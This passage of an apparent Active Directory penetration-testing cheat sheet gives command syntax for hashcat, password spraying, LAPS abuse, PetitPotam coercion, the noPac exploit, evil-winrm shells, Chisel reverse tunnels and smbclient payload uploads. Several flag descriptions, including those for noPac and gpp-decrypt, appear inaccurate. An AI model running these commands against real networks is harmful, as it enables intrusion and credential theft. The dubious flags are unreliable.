`--show`	`hashcat -m 1000 --show NTLM_hashes.txt`	Display already cracked NTLM hashes from previous runs.
`-o [outfile]`	`hashcat -m 0 -a 0 -o cracked.txt md5_hashes.txt rockyou.txt`	Save cracked MD5 hashes to cracked.txt.
`--status`	`hashcat -m 0 -a 3 md5.txt ?a?a?a?a --status`	Show real‑time status updates while cracking.

### enum4linux *enum4linux is a Perl script leveraging SMB, RPC, and SNMP to extract user, group, share, and password policy information from Windows hosts.*

Command/Flag	Syntax Example	Description
`enum4linux [target]`	`enum4linux 192.168.1.100`	Run default SMB/RPC enumeration against the target.
`-a`	`enum4linux -a 192.168.1.100`	Enable all enumeration options (verbose + advanced).
`-U`	`enum4linux -U 192.168.1.100`	Pull a list of domain users.
`-S`	`enum4linux -S 192.168.1.100`	Enumerate SMB shares and permissions.
`-o`	`enum4linux -o output.txt 192.168.1.100`	Write all output to a file.

### enum4linux‑ng *enum4linux‑ng is a Python3 rewrite of enum4linux that offers faster execution, JSON output, and additional modern features.*

Command/Flag	Syntax Example	Description
`enum4linux-ng -t`	`enum4linux-ng -t 192.168.1.100`	Basic enumeration using default modules.
`-a`	`enum4linux-ng -a 192.168.1.100`	Run all enumeration modules (similar to -a in original).
`-u / -p`	`enum4linux-ng -u user -p Pass! 192.168.1.100`	Authenticate with credentials to enumerate restricted data.
`--json`	`enum4linux-ng --json 192.168.1.100`	Output results in JSON format for parsing.
`-o [file]`	`enum4linux-ng -o results.json 192.168.1.100`	Save the JSON output to the specified file.

### windapsearch *windapsearch is a Python LDAP enumeration script for dumping users, groups, computers, and other AD objects via LDAP queries.*

Command/Flag	Syntax Example	Description
`windapsearch.py`	`python windapsearch.py -d corp.local`	Enumerate common AD objects (users, groups, computers) anonymously.
`-u / -p`	`python windapsearch.py -d corp.local -u svc -p Pass123!`	Bind with credentials to enumerate restricted data.
`--filter`	`python windapsearch.py -d corp.local --filter "(objectClass=user)"`	Only return user objects matching the LDAP filter.
`--out-json`	`python windapsearch.py -d corp.local --out-json results.json`	Save full enumeration results as JSON.
`--search-base`	`python windapsearch.py -d corp.local --search-base "OU=Servers,DC=corp,DC=local"`	Limit search to a specific OU.

### DomainPasswordSpray.ps1 *DomainPasswordSpray.ps1 is a PowerShell script for performing password spray attacks against many AD accounts while minimizing lockouts.*

Command/Flag	Syntax Example	Description
`-UsersFile`	`.\DomainPasswordSpray.ps1 -UsersFile users.txt -PasswordList pwds.txt`	Spray a list of passwords across many users.
`-DomainController`	`.\DomainPasswordSpray.ps1 -UsersFile u.txt -PasswordList p.txt -DomainController dc01.corp.local`	Target the specified DC instead of auto-discovery.
`-Delay`	`.\DomainPasswordSpray.ps1 ... -Delay 5000`	Pause 5 seconds between each attempt to reduce lockouts.
`-OutFile`	`.\DomainPasswordSpray.ps1 ... -OutFile spray_results.csv`	Log successes/failures into a CSV.
`-Verbose`	`.\DomainPasswordSpray.ps1 ... -Verbose`	Show detailed attempt output in console.

### LAPSToolkit *LAPSToolkit is a PowerShell module for auditing and abusing Microsoft's Local Administrator Password Solution (LAPS).*

Command/Flag	Syntax Example	Description
`Import-Module`	`Import-Module .\LAPSToolkit.psm1`	Load LAPS functions into your session.
`Get-LAPSADAccounts`	`Get-LAPSADAccounts -Domain corp.local`	List computer accounts with LAPS-managed passwords.
`Invoke-LAPSUser`	`Invoke-LAPSUser -ComputerName SRV01`	Retrieve the local admin password for SRV01.
`Invoke-LAPSPSRemote`	`Invoke-LAPSPSRemote -ComputerName DC01 -ScriptBlock { whoami }`	Run a remote PowerShell script using the LAPS password.
`-Verbose`	`Get-LAPSADAccounts -Verbose`	Display detailed operation logging.

### smbmap *smbmap is a Python tool for enumerating and interacting with SMB shares, supporting recursive download and credential attacks.*

Command/Flag	Syntax Example	Description
`smbmap -H`	`smbmap -H 10.0.0.1 -u user -p Pass`	Basic share enumeration with credentials.
`-R`	`smbmap -H 10.0.0.1 -R`	Recursively download files from all accessible shares.
`--shares`	`smbmap -H 10.0.0.1 --shares`	Only list share names and permissions.
`--no-pass`	`smbmap -H target -u guest --no-pass`	Attempt anonymous login to enumerate shares.
`--domain`	`smbmap -H 10.0.0.1 -u user -p Pass -d CORP`	Specify domain for authentication in AD environments.

### evil‑winrm *evil‑winrm is a Ruby-based client for obtaining an interactive WinRM shell on Windows hosts over HTTP(S).*

Command/Flag	Syntax Example	Description
`evil-winrm -i -u -p`	`evil-winrm -i 10.0.0.1 -u admin -p Pass!`	Launch interactive WinRM shell.
`--transport ssl`	`evil-winrm -i 10.0.0.1 -u admin -p Pass! --transport ssl`	Force SSL/TLS transport for the session.
`-c`	`evil-winrm -i 10.0.0.1 -u user -p Pass -c whoami`	Execute single command and exit.
`--kerb`	`evil-winrm -i dc1 -u user -H <hash> --kerb`	Authenticate using NTLM hash or Kerberos ticket.
`--cert`	`evil-winrm -i host -u svc -p Pass --cert cert.pfx`	Use client certificate for WinRM auth.

### Snaffler *Snaffler is a Python tool for scanning file shares (SMB, NFS, HTTP) to locate sensitive authentication artifacts like hashes and tokens.*

Command/Flag	Syntax Example	Description
`snaffler.py -t smb`	`python snaffler.py -u user -p Pass -t smb`	Scan SMB shares for credential leakage patterns.
`-r report.html`	`python snaffler.py -r creds.html`	Generate HTML report of findings.
`-p wordlist.txt`	`python snaffler.py -p passwords.txt`	Supply custom patterns/keywords file for scanning.
`-v`	`python snaffler.py -v`	Verbose output to console.
`--timeout`	`python snaffler.py --timeout 10`	Set network timeout in seconds per connection.

### smbserver.py *smbserver.py is part of Impacket—hosts a local directory over SMB to easily transfer or serve payloads to Windows hosts.*

Command/Flag	Syntax Example	Description
`smbserver.py share /tmp/files`	`python smbserver.py share /tmp/files`	Export folder as SMB share named “share”.
`--smb2support`	`python smbserver.py share /tmp --smb2support`	Enable SMB2/3 protocol support.
`--username attacker`	`python smbserver.py share /tmp --username attacker`	Set a valid SMB user name (no password).
`--password P@ssw0rd`	`python smbserver.py share /tmp --username attacker --password P@ssw0rd`	Require password authentication for the share.
`--logfile smb.log`	`python smbserver.py share /tmp --logfile smb.log`	Log all activity to a file.

### setspn.exe *setspn.exe is a built‑in Windows utility for querying and manipulating Service Principal Names (SPNs) in Active Directory.*

Command/Flag	Syntax Example	Description
`setspn.exe -L svc_account`	`setspn.exe -L svc_account`	List all SPNs for the specified service account.
`-S`	`setspn.exe -S HTTP/web.corp.local svc_account`	Add SPN if not already present, checking duplicates.
`-D`	`setspn.exe -D HOST/server.corp.local svc_account`	Remove the specified SPN entry.
`-Q`	`setspn.exe -Q */server.corp.local`	Query which account owns the given SPN.
`-X`	`setspn.exe -X`	Scan the domain for duplicate SPNs.

### PetitPotam.py *PetitPotam.py is a Python PoC to coerce Windows hosts into authenticating via MS-EFSRPC RPC calls (e.g., EfsRpcOpenFileRaw).*

Command/Flag	Syntax Example	Description
`PetitPotam.py -t`	`python PetitPotam.py -t dc1.corp.local -u user -p Pass!`	Coerce target to authenticate via EfsRpcOpenFileRaw.
`--certificate`	`python PetitPotam.py -t dc1 -u user -p Pass! --certificate`	Use certificate auth coercion instead of NTLM.
`--timeout`	`python PetitPotam.py -t dc1 --timeout 5`	Set a connection timeout of 5 seconds.
`-h/--help`	`python PetitPotam.py -h`	Display help and usage options.

### noPac.py *noPac.py exploits CVE‑2021‑42278/42287 to manipulate userAccountControl attributes and add users to privileged OUs.*

Command/Flag	Syntax Example	Description
`noPac.py`	`python noPac.py -u user -p Pass! -d corp.local`	Exploit CVE‑2021‑42278/42287 to add yourself to a new OU.
`--ou`	`python noPac.py ... --ou "OU=Admins,DC=corp,DC=local"`	Specify target OU for privilege escalation.
`--dc`	`python noPac.py ... --dc dc2.corp.local`	Target a specific domain controller for the exploit.
`-v`	`python noPac.py ... -v`	Verbose output for debugging exploit steps.

### adidnsdump *adidnsdump.py is an Impacket script to enumerate and dump all AD‑integrated DNS records from a domain controller.*

Command/Flag	Syntax Example	Description
`adidnsdump.py -d`	`python adidnsdump.py -d corp.local -u user -p Pass!`	Dump all AD‑integrated DNS records.
`--zone`	`python adidnsdump.py -d corp.local --zone corp.local`	Limit dump to a specific DNS zone.
`--outfile`	`python adidnsdump.py ... --outfile dns.txt`	Save output to a text file.
`-v`	`python adidnsdump.py ... -v`	Verbose mode for detailed logs.

### gpp‑decrypt *gpp‑decrypt extracts and decrypts passwords stored in Group Policy Preferences XML files.*

Command/Flag	Syntax Example	Description
`gpp-decrypt`	`gpp-decrypt "ABCD1234..."`	Decrypt a single encrypted password string.
`--input-file`	`gpp-decrypt --input-file gpo.xml`	Parse an entire GPO XML and decrypt all secrets.
`--output`	`gpp-decrypt --input-file gpo.xml --output creds.csv`	Export decrypted credentials into a CSV.
`--quiet`	`gpp-decrypt "ABCD" --quiet`	Only print decrypted strings, suppress extra output.

### ADExplorer (ADExplorer.exe) *ADExplorer is a GUI tool from Sysinternals for browsing, editing, and snapshotting Active Directory databases.*

Command/Flag	Syntax Example	Description
`ADExplorer.exe`	`ADExplorer.exe`	Launch the GUI for live AD browsing.
`–f <file>`	`ADExplorer.exe –f dump.ad1`	Open a saved snapshot for offline analysis.
`File → Save`	GUI action	Save the current AD view to a .ad1 snapshot.
`View → Attributes`	GUI action	Toggle detailed attribute display for selected object.

### PingCastle *PingCastle is an AD security auditing tool that produces risk assessments and maturity scores based on best practices.*

Command/Flag	Syntax Example	Description
`PingCastle.exe --healthcheck`	`PingCastle.exe --healthcheck corp.local`	Full domain security assessment.
`--CSV`	`PingCastle.exe --healthcheck corp.local --CSV`	Export results into CSV format.
`--ADCS`	`PingCastle.exe --ADCS corp.local`	Audit Active Directory Certificate Services.
`--quickview`	`PingCastle.exe --quickview corp.local`	Generate a high‑level summary report.

### Group3r *Group3r is a Windows .NET tool for auditing GPOs—analyzing security settings, user rights, and delegation across Group Policy Objects.*

Command/Flag	Syntax Example	Description
`Group3r.exe /scanGPO`	`Group3r.exe /scanGPO corp.local`	Audit GPO security settings across domain.
`/output <file>`	`Group3r.exe /scanGPO corp.local /output gpo.html`	Generate an HTML findings report.
`/scanUserRights`	`Group3r.exe /scanUserRights corp.local`	Review user rights assignments in GPOs.
`/scanDelegation`	`Group3r.exe /scanDelegation corp.local`	Identify delegation weaknesses in AD.

### ADRecon *ADRecon is a PowerShell framework for collecting a broad set of AD data (users, groups, ACLs, trusts, GPOs) and exporting to Excel/CSV.*

Command/Flag	Syntax Example	Description
`.\ADRecon.ps1 -CollectionMethod All`	`.\ADRecon.ps1 -CollectionMethod All`	Collect users, groups, computers, ACLs, trusts, GPOs.
`-OutputFolder`	`.\ADRecon.ps1 -OutputFolder C:\Recon`	Define directory for Excel/CSV outputs.
`-ExcludeData`	`.\ADRecon.ps1 -ExcludeData Trusts,ACLs`	Skip collecting specified data categories.
`-Verbose`	`.\ADRecon.ps1 -Verbose`	Show detailed progress in console.
`-DomainController`	`.\ADRecon.ps1 -DomainController dc1.corp.local`	Target a specific DC for data collection.

### Proxychains *Proxychains is a tool to force any TCP connection made by a given application to go through one or more proxies (SOCKS4, SOCKS5, HTTP).*

Command/Flag	Syntax Example	Description
`proxychains <command>`	`proxychains curl http://example.com`	Wraps the specified command so that all its TCP traffic is routed through the proxies defined in the config file.
`-f <config_file>`	`proxychains -f /etc/proxychains.conf ssh user@host`	Use an alternate proxychains configuration file instead of the default `/etc/proxychains.conf`.
`-q`	`proxychains -q wget http://example.com/file`	Quiet mode; suppresses the startup banner and most log messages.
`-s`	`proxychains -s nmap -sT -Pn target`	Show summary statistics about proxy usage after the wrapped command completes.

--- ### Chisel *Chisel is a fast TCP/UDP tunnel over HTTP, useful for pivoting and bypassing firewall restrictions.*

Command/Flag	Syntax Example	Description
`server`	`chisel server -p 8000`	Start Chisel in server mode, listening for client connections on port 8000.
`--reverse`	`chisel server --reverse -p 8000`	Enable reverse proxy mode so clients can bind ports on the server side.
`client … R:…`	`chisel client 10.0.0.5:8000 R:1080:localhost:22`	Connect to the Chisel server and create a reverse tunnel from the server’s port 1080 back to the client’s localhost:22.
`client … S:…`	`chisel client 10.0.0.5:8000 S:1080:localhost:80`	Create a local forward tunnel on the client: expose localhost:1080 which forwards through the server into its localhost:80.

### SmbClient *SmbClient is a versatile command‑line SMB/CIFS client for browsing shares, transferring files, and executing remote commands on Windows hosts.*

Command/Flag	Syntax Example	Description
`-L`	`smbclient -L //10.0.0.1 -U user%Pass`	List all available shares on the target host.
`//host/share`	`smbclient //10.0.0.1/C$ -U Administrator%P@ssw0rd`	Connect to a specific share (here the hidden C$ share) using credentials.
`-U`	`smbclient //dc1/C$ -U svc_account%Sword!234`	Authenticate with username%password format.
`-W`	`smbclient //10.0.0.1/Share -U user%Pass -W CORP`	Specify the Windows workgroup or domain for authentication.
`-N`	`smbclient -L //10.0.0.1 -N`	Do not prompt for a password (useful for anonymous access).
`-m`	`smbclient //10.0.0.1/Share -U user%Pass -m SMB3`	Force use of a specific SMB protocol version (e.g., SMB2, SMB3).
`-p`	`smbclient //10.0.0.1/Share -p 445 -U user%Pass`	Specify a custom TCP port (default is 445).
`-d`	`smbclient //10.0.0.1/Share -U user%Pass -d 3`	Set the debug level (0–10) for verbose output.
`-c`	`smbclient //10.0.0.1/Share -U user%Pass -c 'get secret.txt'`	Execute a single SMB command (e.g., `get`, `put`, `dir`) and exit.
`get`	`get confidential.zip`	Download a file from the connected share to the local machine.
`put`	`put payload.exe`	Upload a file from the local machine to the connected share.
`mget / mput`	`mget .doc; mput .dll`	Download or upload multiple files matching a wildcard.
`mask`	`mask 0777`	Set file permission bits on uploaded files.
`recurse`	`recurse ON; mget *`	Enable recursive get/put through subdirectories.